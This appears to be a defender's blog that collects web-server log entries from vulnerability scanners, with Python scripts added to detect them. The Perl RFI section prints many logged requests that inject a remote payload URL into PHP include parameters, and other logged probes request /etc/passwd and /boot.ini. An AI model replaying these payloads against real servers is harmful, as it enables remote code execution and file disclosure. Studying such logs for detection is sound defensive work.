Ask first
June 1, 2009
Which OS am I looking for?
http://ataqueservidor.wordpress.com/2009/05/12/dfind-exe-web-0-0-0-0-v-spy-unix/
To fool these treasure hunters we can add a custom HTTP header (Custom HTTP Headers in the IIS site properties) containing the word "unix": the scanner then believes it is attacking a Unix system when it is really a Microsoft environment. This only diverts scanners that key on that string; the probes still arrive and still need to be logged and watched.
User-Agent "Morfeus Fucking Scanner"
May 31, 2009
Another scanner bot.
Perl RFI scanner
May 26, 2009
Scanner detected in the logs: http://site.mynet.com/senkofiles/perlrfiscanner.txt
Every request below passes an attacker-controlled URL (the payload t.txt) in an include-path parameter of some known PHP application. The trailing "?" on that URL is the usual RFI trick: whatever the vulnerable script appends to the path ends up as a harmless query string in the fetch from the attacker's server instead of breaking it. None of these applications exist here, hence the 404 on every line.
- - [26/May/2009:09:22:15 +0200] "GET /Forums/admin/index.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1" 404 325
- - [26/May/2009:09:22:15 +0200] "GET /forum/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1" 404 328
- - [26/May/2009:09:22:16 +0200] "GET /impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1" 404 322
- - [26/May/2009:09:22:16 +0200] "GET /forums/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1" 404 329
- - [26/May/2009:09:22:16 +0200] "GET /webcalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 339
- - [26/May/2009:09:22:16 +0200] "GET /WebCalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 339
- - [26/May/2009:09:22:16 +0200] "GET /cacti/include/config_settings.php?config[include_path]=http://xxx/appserv/t.txt? HTTP/1.1" 404 336
- - [26/May/2009:09:22:17 +0200] "GET /webcalendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 335
- - [26/May/2009:09:22:17 +0200] "GET /calendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 336
- - [26/May/2009:09:22:17 +0200] "GET /calendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 332
- - [26/May/2009:09:22:17 +0200] "GET /kalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 336
- - [26/May/2009:09:22:17 +0200] "GET /webcal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 334
- - [26/May/2009:09:22:17 +0200] "GET /cal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 331
- - [26/May/2009:09:22:18 +0200] "GET /appserv/main.php?appserv_root=http://xxx/appserv/t.txt? HTTP/1.1" 404 319
- - [26/May/2009:09:22:18 +0200] "GET /includes/db_adodb.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 324
- - [26/May/2009:09:22:18 +0200] "GET /includes/session.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 323
- - [26/May/2009:09:22:18 +0200] "GET /modules/projects/gantt.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1" 404 329
- - [26/May/2009:09:22:18 +0200] "GET /modules/projects/gantt2.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1" 404 330
- - [26/May/2009:09:22:19 +0200] "GET /modules/projects/vw_files.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1" 404 332
- - [26/May/2009:09:22:19 +0200] "GET /modules/admin/vw_usr_roles.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 333
- - [26/May/2009:09:22:19 +0200] "GET /modules/public/calendar.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 330
- - [26/May/2009:09:22:19 +0200] "GET /modules/public/date_format.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 333
- - [26/May/2009:09:22:19 +0200] "GET /yabbse/Sources/Packages.php?sourcedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 330
- - [26/May/2009:09:22:20 +0200] "GET /yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://xxx/appserv/t.txt? HTTP/1.1" 404 338
- - [26/May/2009:09:22:20 +0200] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1" 404 348
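The pattern behind those lines is easy to pull out of a log mechanically: a query parameter whose value is itself an absolute URL, and usually one that ends in "?". The following checker is an added example written for this post, not the blogger's own tooling; the sample log text is constructed here (modelled on the entries above, with two ordinary requests added so the filter has something to leave alone), and the function names and the "terminated" heuristic are my own choices.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines modelled on the entries quoted above (client
# address and identity already blanked to "-"); the last two are ordinary requests
# added so the filter has something to leave alone. Not real traffic.
SAMPLE_LOG = """\
- - [26/May/2009:09:22:15 +0200] "GET /Forums/admin/index.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1" 404 325
- - [26/May/2009:09:22:16 +0200] "GET /cacti/include/config_settings.php?config[include_path]=http://xxx/appserv/t.txt? HTTP/1.1" 404 336
- - [26/May/2009:09:22:18 +0200] "GET /modules/projects/gantt.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1" 404 329
- - [26/May/2009:09:22:30 +0200] "GET /index.php?page=about HTTP/1.1" 200 5120
- - [26/May/2009:09:22:31 +0200] "GET /search.php?q=http://example.org/ HTTP/1.1" 200 2048
"""

# Apache-style request line: [timestamp] "METHOD /path?query HTTP/x.y" status
LINE_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def rfi_probes(log_text):
    """Return one (timestamp, path, parameter, url, terminated) tuple for every
    query parameter whose value is an absolute URL. 'terminated' is True when the
    URL ends in '?' or carries a NUL byte (%00), the usual RFI trick: whatever the
    vulnerable script appends to the include path ('/config.php', '.inc') then
    lands in the query string of the attacker's server instead of breaking the fetch."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if value.lower().startswith(("http://", "https://", "ftp://")):
                terminated = value.endswith("?") or "\x00" in value
                hits.append((m.group("ts"), parts.path, name, value, terminated))
    return hits


def payload_hosts(hits):
    """Group hits by the host serving the payload: one host pushed into many
    different scripts and parameters is a scanner sweep, not a user pasting a link."""
    return Counter(urlsplit(h[3]).netloc for h in hits)


if __name__ == "__main__":
    probes = rfi_probes(SAMPLE_LOG)
    for ts, path, name, url, terminated in probes:
        flag = "RFI" if terminated else "url-in-param"
        print(f"{ts}  {flag:12s} {path} {name}={url}")
    print(payload_hosts(probes))
```

The search.php line shows why the "terminated" flag matters: a URL in a parameter is not by itself an attack, but a URL ending in "?" pushed into a parameter named like an include path almost always is. Run it over a real access log by reading the file into `rfi_probes` instead of `SAMPLE_LOG`.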
FHScan+Core+1.1 entries
May 21, 2009
It probes for these paths (admin consoles such as /jmx-console/, /web-console/ and /manager/html, stats and backup directories, phpMyAdmin, and the /etc/passwd and /boot.ini file-disclosure checks); every one came back 404 here:
2009-05-12 23:31:29 /FastHTTPAuthScanner200test/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:29 /admin/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:29 /wwwstats/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:30 /cache-stats/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:33 /stats/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:33 /web-console/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:33 /jmx-console/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:37 /manager/html - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:40 /webcacheadmin/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:44 /backup/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:44 /~root/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:44 /phpmyadmin/ - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:48 /etc/passwd - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:48 /boot.ini - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:51 /etc/passwd - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:51 /boot.ini - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:51 /portal/page/portal/TOPLEVELSITE/Welcome - 404 Mozilla/5.0+(FHScan+Core+1.1) -
2009-05-12 23:31:53 /security/security.php - 404 Mozilla/5.0+(FHScan+Core+1.1) -
Pmafind
May 19, 2009
A scanner that looks for phpMyAdmin installations.
FHScan+Core+1.1
May 14, 2009
Tarasco Security: Fast HTTP Vulnerability Scanner: http://www.tarasco.org/security/FHScan_Fast_HTTP_Vulnerability_Scanner/
Log entry (the User-Agent field; IIS writes spaces inside a field as "+"):
404 Mozilla/5.0+(FHScan+Core+1.1)
New cs-uri entries in the logs
May 13, 2009
/w00tw00t.at.ISC.SANS.test0:) 1
/w10tw01t.at.ISC.SANS.DFind:( 1
Phpmyadmin
May 7, 2009
Repeated log entries:
/phpmyadmin/main.php
/phpMyAdmin/main.php
/myadmin/main.php
/phpmyadmin2/main.php
/PMA/main.php
/mysql/main.php
/db/main.php
Query (Log Parser syntax) that counts requests per cs-uri-stem, most frequent first:
select cs-uri-stem, count(*) as a from '\W3SVC1\W3SVC1\*.*' group by cs-uri-stem order by a desc
I don't have Horde
May 4, 2009
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /horde/README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /horde2/README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /horde3/README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /horde-3.0.9/README | - |
| c:\a\W3SVC1 | 25/04/2009 0:13:17 | - | /Horde/README | - |
phpMyAdmin installations
May 3, 2009
15:01:21 W3SVC1 0.0.0.0 GET /phpMyAdmin/main.php - 80 - 0.0.0.0 - 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /main.php - 80 - 0.0.0.0 - 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /php/main.php - 80 - 0.0.0.0 - 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /PMA/main.php - 80 - 0.0.0.0 - 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /phpmyadmin/main.php - 80 - 0.0.0.0 - 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /phpmyadmin2/main.php - 80 - 0.0.0.0 - 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /db/main.php - 80 - 0.0.0.0 - 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /mysql/main.php - 80 - 0.0.0.0 - 404 0 3
15:01:21 W3SVC1 0.0.0.0 GET /myadmin/main.php - 80 - 0.0.0.0 - 404 0 3
15:03:24 W3SVC1 0.0.0.0 GET /phpmyadmin/main.php - 80 - 0.0.0.0 - 404 0 3
15:03:24 W3SVC1 0.0.0.0 GET /phpMyAdmin/main.php - 80 - 0.0.0.0 - 404 0 3
15:03:24 W3SVC1 0.0.0.0 GET /myadmin/main.php - 80 - 0.0.0.0 - 404 0 3
Recommendations against possible attacks on phpMyAdmin
- Update phpMyAdmin
- Change the path it is served from
- Require authentication on the directory
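The signatures collected across these posts (the FHScan Core 1.1 and Morfeus user-agents, the w00tw00t/DFind probes, the phpMyAdmin main.php and Horde README locators) and the Log Parser group-by query can all be checked from one small script over an IIS W3C extended log. This is an added example written for this page, not the blogger's tooling: the log text below is constructed (standard IIS field names, made-up rows modelled on the entries quoted above), and the signature names, the rule list and the function names are my own choices. The w00tw00t rule deliberately generalizes the two variants on the page to any w??tw??t.at. prefix.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed IIS 6 W3C extended log modelled on the probes quoted in the posts
# above. Field names are the standard IIS ones; the rows are made up for this example.
SAMPLE_W3C = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-05-12 23:31:29
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-05-12 23:31:29 0.0.0.0 GET /admin/ - 80 - 0.0.0.0 Mozilla/5.0+(FHScan+Core+1.1) 404 0 3
2009-05-12 23:31:33 0.0.0.0 GET /jmx-console/ - 80 - 0.0.0.0 Mozilla/5.0+(FHScan+Core+1.1) 404 0 3
2009-05-12 23:31:37 0.0.0.0 GET /manager/html - 80 - 0.0.0.0 Mozilla/5.0+(FHScan+Core+1.1) 404 0 3
2009-05-13 08:10:02 0.0.0.0 GET /w00tw00t.at.ISC.SANS.test0:) - 80 - 0.0.0.0 - 404 0 3
2009-05-13 08:10:02 0.0.0.0 GET /w10tw01t.at.ISC.SANS.DFind:( - 80 - 0.0.0.0 - 404 0 3
2009-05-13 15:01:21 0.0.0.0 GET /phpMyAdmin/main.php - 80 - 0.0.0.0 - 404 0 3
2009-05-13 15:01:21 0.0.0.0 GET /PMA/main.php - 80 - 0.0.0.0 - 404 0 3
2009-05-13 15:03:24 0.0.0.0 GET /phpmyadmin/main.php - 80 - 0.0.0.0 - 404 0 3
2009-05-13 15:03:24 0.0.0.0 GET /phpMyAdmin/main.php - 80 - 0.0.0.0 - 404 0 3
2009-05-13 16:13:17 0.0.0.0 GET /horde/README - 80 - 0.0.0.0 - 404 0 3
2009-05-13 16:13:17 0.0.0.0 GET /horde3/README - 80 - 0.0.0.0 - 404 0 3
2009-05-13 16:20:00 0.0.0.0 GET /index.html - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0
2009-05-13 16:20:01 0.0.0.0 GET /index.html - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0
"""


def parse_w3c(text):
    """Parse IIS W3C extended log text into dict rows keyed by the #Fields header.
    IIS separates fields with spaces and writes spaces inside a value as '+',
    so the User-Agent is decoded back with unquote_plus."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # the header may change mid-file; track it
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split(" ")
            if len(values) != len(fields):
                continue                      # truncated line: skip rather than misalign columns
            row = dict(zip(fields, values))
            if "cs(User-Agent)" in row:
                row["cs(User-Agent)"] = unquote_plus(row["cs(User-Agent)"])
            rows.append(row)
    return rows


def top_uri_stems(rows, status=None):
    """Same result as the Log Parser query in the post:
    SELECT cs-uri-stem, COUNT(*) ... GROUP BY cs-uri-stem ORDER BY count DESC.
    Pass status="404" to see only the misses, which is where the scanners live."""
    counts = Counter(r["cs-uri-stem"] for r in rows
                     if status is None or r["sc-status"] == status)
    return counts.most_common()


# Signature rules derived from the log entries collected in the posts above.
SIGNATURES = [
    ("FHScan", lambda r: "FHScan Core" in r["cs(User-Agent)"]),
    ("Morfeus", lambda r: "Morfeus" in r["cs(User-Agent)"]),
    ("DFind/w00tw00t", lambda r: re.match(r"/w\d\dtw\d\dt\.at\.", r["cs-uri-stem"]) is not None),
    ("phpMyAdmin locator", lambda r: r["cs-uri-stem"].lower().endswith("/main.php")
                                     and r["sc-status"] == "404"),
    ("Horde locator", lambda r: r["cs-uri-stem"].endswith("/README")
                                and "horde" in r["cs-uri-stem"].lower()),
]


def tag_scanner(row):
    """First matching signature name, or None for traffic that looks ordinary."""
    for name, test in SIGNATURES:
        if test(row):
            return name
    return None


def scanner_summary(rows):
    """Number of matching requests per signature; untagged rows are dropped."""
    return Counter(t for t in map(tag_scanner, rows) if t)


if __name__ == "__main__":
    rows = parse_w3c(SAMPLE_W3C)
    for stem, n in top_uri_stems(rows, status="404"):
        print(f"{n:4d} {stem}")
    print(scanner_summary(rows))
```

The phpMyAdmin rule keys on a 404 for any .../main.php on purpose: on a server that does host phpMyAdmin the same stem would return 200 and the interesting signal becomes the burst of a dozen directory variants from one client within a second, which `top_uri_stems` without the status filter makes visible. sc-win32-status 3 on the 404 rows is the Win32 "path not found" code IIS records when the file is simply absent.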